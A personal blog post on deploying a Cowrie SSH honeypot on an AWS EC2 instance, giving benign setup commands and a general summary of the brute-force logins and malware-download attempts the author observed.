How I Deployed a Cowrie Honeypot on AWS EC2 instance to Catch Cyber Intruders

In the ever-evolving landscape of cybersecurity, staying one step ahead of malicious actors is a constant challenge. One effective strategy to gain insights into attacker behaviors is the deployment of honeypots—decoy systems designed to lure in cyber intruders. In this blog, I'll walk you through how I deployed a Cowrie honeypot on AWS to catch cyber intruders, share interesting observations from the logs, and discuss how honeypots contribute to understanding real-world attack patterns.

Introduction to Honeypots: What They Are and Why They Matter

What Is a Honeypot?

A honeypot is a security mechanism set up to detect, deflect, or study attempts at unauthorized use of information systems. It appears as a legitimate part of the network but is isolated and monitored. Honeypots serve as traps for attackers, providing valuable data on attack methodologies and vulnerabilities that malicious actors exploit.

Why Honeypots Matter

• Threat Intelligence: Honeypots collect data on attack vectors, malware signatures, and exploit techniques.

• Early Warning System: They act as an early warning system by detecting attacks that bypass traditional security measures.

• Vulnerability Assessment: Help identify and patch security weaknesses in the network.

• Legal and Ethical Hacking: Provide a controlled environment to study attacker behavior without risking actual assets.

Overview of Cowrie: A Medium-Interaction SSH Honeypot

What Is Cowrie?

Cowrie is an open-source, medium-interaction SSH and Telnet honeypot designed to log brute-force attacks and shell interaction performed by attackers. Unlike low-interaction honeypots, Cowrie allows attackers to execute commands, providing deeper insights into their tactics.

Key Features of Cowrie

• SSH and Telnet Emulation: Simulates a fully functional shell for attackers to interact with.

• Command Logging: Records all commands and actions performed by the intruder.

• File Capture: Collects malware and tools uploaded by attackers via SFTP and SCP.

• Session Recording: Offers session playback to analyze the attacker's activities in detail.

Why Choose Cowrie?

• Realism: Provides a realistic environment, increasing the likelihood that attackers will engage.

• Extensibility: Supports plugins and can be integrated with other security tools.

• Community Support: Active development and support from a community of cybersecurity professionals.

Steps to Deploy Cowrie on AWS (With Code Snippets)

Deploying Cowrie on AWS involves several steps, from setting up the EC2 instance to configuring the honeypot software. Below is a detailed guide to help you set up your own Cowrie honeypot.

Prerequisites

• AWS Account: Access to AWS Management Console.

• Basic Linux Knowledge: Familiarity with the command line and SSH.

• Security Considerations: Ensure compliance with AWS policies and legal regulations regarding honeypot deployment.

Step 1: Launch an EC2 Instance

1. Select AMI (Amazon Machine Image): Choose an Ubuntu Server 20.04 LTS AMI.

2. Instance Type: Select a t2.micro instance for testing purposes.

3. Configure Security Group: Open ports 22 (SSH) and 2222 (Cowrie's SSH port).

Step 2: Connect to the EC2 Instance

Use SSH to connect to your instance:

bashCopy codessh -i /path/to/your/key.pem ubuntu@your-ec2-public-dns

Step 3: Update and Install Dependencies

Update the package lists and install required packages:

bashCopy codesudo apt update
sudo apt install -y git python3 python3-venv python3-dev libssl-dev libffi-dev build-essential

Step 4: Clone the Cowrie Repository

Clone Cowrie from GitHub:

bashCopy codecd /opt
sudo git clone https://github.com/cowrie/cowrie.git
sudo chown -R ubuntu:ubuntu cowrie

Step 5: Set Up a Python Virtual Environment

Create and activate a virtual environment:

bashCopy codecd cowrie
python3 -m venv cowrie-env
source cowrie-env/bin/activate

Step 6: Install Cowrie Dependencies

Install the required Python packages:

bashCopy codepip install --upgrade pip
pip install -r requirements.txt

Step 7: Configure Cowrie

Copy the sample configuration files:

bashCopy codecp etc/cowrie.cfg.dist etc/cowrie.cfg
cp etc/userdb.example etc/userdb.txt

Edit etc/cowrie.cfg to set up basic configurations:

iniCopy code[ssh]
listen_endpoints = tcp:2222:interface=0.0.0.0

Step 8: Start Cowrie

Run Cowrie in the background:

bashCopy codebin/cowrie start

Verify that Cowrie is running:

bashCopy codebin/cowrie status

Step 9: Adjust AWS Security Group (Optional)

If you want to expose Cowrie's SSH port (usually port 2222) to the internet, modify the Security Group to allow inbound traffic on port 2222. Be cautious, as exposing ports can increase the attack surface.

Step 10: Testing the Honeypot

From another machine, attempt to SSH into the honeypot:

bashCopy codessh -p 2222 root@your-ec2-public-dns

You should see a fake SSH login prompt. Any interaction will be logged by Cowrie.

Interesting Observations from Logs and Intrusions

After running Cowrie for a few days, I collected a wealth of data from various intrusion attempts.

Common Username and Password Combinations

Attackers often used default or commonly used credentials:

• Usernames: root, admin, user, test

• Passwords: 123456, password, admin, qwerty

Attack Patterns

• Brute-Force Attacks: Repeated login attempts using different credential combinations.

• Automated Scripts: Scripts attempting to execute commands to download and install malware.

• Command Execution: Attempts to run commands like wget, curl, or chmod to manipulate the system.

Malware Samples Collected

• Crypto Miners: Scripts to install cryptocurrency mining software.

• Botnets: Code snippets attempting to add the honeypot to a botnet network.

• Backdoors: Attempts to create reverse shells for persistent access.

Geographic Distribution of Attacks

By analyzing IP addresses, I found that intrusion attempts originated from:

• China

• Russia

• United States

• Brazil

Note: IP addresses can be spoofed or part of proxy networks, so geolocation may not be accurate.

How Honeypots Help in Understanding Real-World Attack Patterns

Insight into Attacker Behavior

• Tactics and Techniques: Understanding the methods attackers use to infiltrate systems.

• Toolkits and Scripts: Identifying common tools and scripts used in attacks.

• Zero-Day Exploits: Detecting new vulnerabilities being exploited in the wild.

Enhancing Defensive Strategies

• Improved Detection: Updating intrusion detection systems with signatures and patterns observed.

• Patch Management: Prioritizing patches for vulnerabilities actively exploited.

• Security Policies: Refining access controls and authentication mechanisms based on attack trends.

Contribution to the Security Community

• Data Sharing: Providing anonymized data to security organizations and research groups.

• Collaborative Defense: Working with others to develop countermeasures against common threats.

Conclusion

Deploying a Cowrie honeypot on AWS was an enlightening experience that provided firsthand insight into the constant probing and attacks occurring on the internet. By capturing and analyzing intrusion attempts, I gained valuable knowledge about attacker behaviors and strategies, which is crucial for strengthening cybersecurity defenses.

Key Takeaways

• Proactive Learning: Honeypots are powerful tools for staying informed about current threats.

• Continuous Monitoring: Regularly reviewing logs and patterns is essential for effective analysis.

• Ethical Considerations: Ensure compliance with legal and ethical guidelines when deploying honeypots.

Resources

• Cowrie Documentation

• AWS EC2 User Guide

Disclaimer: Ensure you comply with all applicable laws and AWS policies when deploying honeypots. Unauthorized interception or monitoring of traffic may be illegal in some jurisdictions.